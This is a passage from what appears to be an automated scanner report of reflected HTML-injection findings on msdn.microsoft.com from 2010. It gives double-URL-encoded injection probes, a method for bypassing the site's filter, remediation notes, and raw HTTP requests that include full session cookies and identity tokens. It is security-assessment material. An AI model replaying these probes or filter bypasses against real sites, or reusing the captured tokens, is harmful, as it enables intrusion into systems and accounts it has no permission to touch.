17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9212 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:16:06 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library5dc98"><a>a7defceea7f/ms689718(VS.85" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 597f0%2522%253e%253ca%253e4ee946ae8f7 was submitted in the REST URL parameter 3. This input was echoed as 597f0"><a>4ee946ae8f7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ms689718(VS.85597f0%2522%253e%253ca%253e4ee946ae8f7 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9211 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:16:12 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms689718(VS.85597f0"><a>4ee946ae8f7" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87014%2522%253e%253ca%253e61c23bd9200 was submitted in the REST URL parameter 1. This input was echoed as 87014"><a>61c23bd9200 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:55:40 GMT Content-Length: 9188
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us87014"><a>61c23bd9200/library/ms689718(VS.85)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbb0d%2522%253e%253ca%253e61e6c453a14 was submitted in the REST URL parameter 2. This input was echoed as cbb0d"><a>61e6c453a14 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:56:11 GMT Content-Length: 9189
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarycbb0d"><a>61e6c453a14/ms689718(VS.85)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 598c0%2522%253e%253ca%253e64b1072645f was submitted in the REST URL parameter 3. This input was echoed as 598c0"><a>64b1072645f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:56:41 GMT Content-Length: 9198
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms689718(VS.85).aspx598c0"><a>64b1072645f" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9acb%2522%253e%253ca%253e41d5fa23755 was submitted in the REST URL parameter 1. This input was echoed as d9acb"><a>41d5fa23755 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usd9acb%2522%253e%253ca%253e41d5fa23755/library/ms689718(v=vs.85 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9215 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:23 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd9acb"><a>41d5fa23755/library/ms689718(v=vs.85" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0f03%2522%253e%253ca%253e6c8979e7095 was submitted in the REST URL parameter 2. This input was echoed as f0f03"><a>6c8979e7095 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryf0f03%2522%253e%253ca%253e6c8979e7095/ms689718(v=vs.85 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9215 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:38 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryf0f03"><a>6c8979e7095/ms689718(v=vs.85" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2915%2522%253e%253ca%253e82109de73e3 was submitted in the REST URL parameter 3. This input was echoed as a2915"><a>82109de73e3 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ms689718(va2915%2522%253e%253ca%253e82109de73e3=vs.85 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 